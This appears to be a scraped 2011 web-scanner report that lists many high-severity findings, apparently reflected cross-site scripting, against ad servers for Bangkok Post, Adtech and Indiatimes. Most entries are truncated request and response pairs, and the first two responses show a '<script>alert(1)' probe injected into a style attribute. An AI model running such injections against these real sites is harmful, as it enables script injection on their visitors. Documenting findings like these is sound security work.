HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:56:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Content-Length: 1326 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <h3 class="header" style='color:#ED7007eb396'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads4.bangkokpost |
Path: | /ads_server/iframe/ |
GET /ads_server/iframe/?&SITE Host: ads4.bangkokpost.co.th Proxy-Connection: keep-alive Referer: http://www.bangkokpost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:56:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.3 Content-Length: 1304 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <h3 class="header" style='color:#ED700724c70'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /addyn/3.0/5132/1305477/0 |
GET /addyn/3.0/5132/1305477/0 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 531 document.write('<a href="http://yads.zedo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /addyn/3.0/5132/1305477/0 |
GET /addyn/3.0/5132/1305477/0 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 534 document.write('<a href="http://yads.zedo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adrawdata/3.0/5108.1 |
GET /adrawdata/3.0/5108.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 8844 <!-- 00.00000 --> <adFrames version="2.1" type="adFramesV2" ccid="1816855-1" rev="12033:12037MP" path="invtype=display;rid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adrawdata/3.0/5108.1 |
GET /adrawdata/3.0/5108.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19614 <!-- 00.00000 --> <adFrames version="2.1" type="adFramesV2" ccid="1977158-1" rev="12033:12037MP" path="invtype=display;rid ...[SNIP]... http://videoegg.adbureau ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adrawdata/3.0/5108.1 |
GET /adrawdata/3.0/5108.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 8839 <!-- 00.00000 --> <adFrames version="2.1" type="adFramesV2" ccid="1816855-1" rev="12033:12037MP" path="invtype=display;rid ...[SNIP]... http://videoegg.adbureau ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adrawdata/3.0/5108.1 |
GET /adrawdata/3.0/5108.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 15454 <!-- 00.00000 --> <adFrames version="2.1" type="adFramesV2" ccid="1827986-1" rev="12033:12037MP" path="invtype=display;rid ...[SNIP]... ttp://videoegg.adbureau ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adrawdata/3.0/5108.1 |
GET /adrawdata/3.0/5108.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19652 <!-- 00.00000 --> <adFrames version="2.1" type="adFramesV2" ccid="1977158-1" rev="12033:12037MP" path="invtype=display;rid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.adtechus |
Path: | /adrawdata/3.0/5108.1 |
GET /adrawdata/3.0/5108.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19670 <!-- 00.00000 --> <adFrames version="2.1" type="adFramesV2" ccid="1977158-1" rev="12033:12037MP" path="invtype=display;rid ...[SNIP]... ttp://videoegg.adbureau ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:38:33 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 372 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:39:19 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 372 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:39:59 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 371 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:40:46 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 376 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:05:48 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 372 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:06:33 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 372 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:12 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 372 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:58 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 376 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:06:00 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:06:45 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 374 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:25 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:08:10 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 377 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:11:02 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 1528 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: text/html <!-- Support: http://adstil.indiatimes ...[SNIP]... atimes.com/RealMedia/ads ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:11:05 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 1497 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: text/html <!-- Support: http://adstil.indiatimes ...[SNIP]... ealMedia/ads/adstream_lx //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:06:21 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:06 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 374 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:45 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:08:31 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 377 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:11:11 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 1498 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: text/html <!-- Support: http://adstil.indiatimes ...[SNIP]... ealMedia/ads/adstream_lx //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:11:09 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 1526 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: text/html <!-- Support: http://adstil.indiatimes ...[SNIP]... atimes.com/RealMedia/ads ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:42:55 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 374 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:43:41 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:44:20 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:45:05 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 377 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
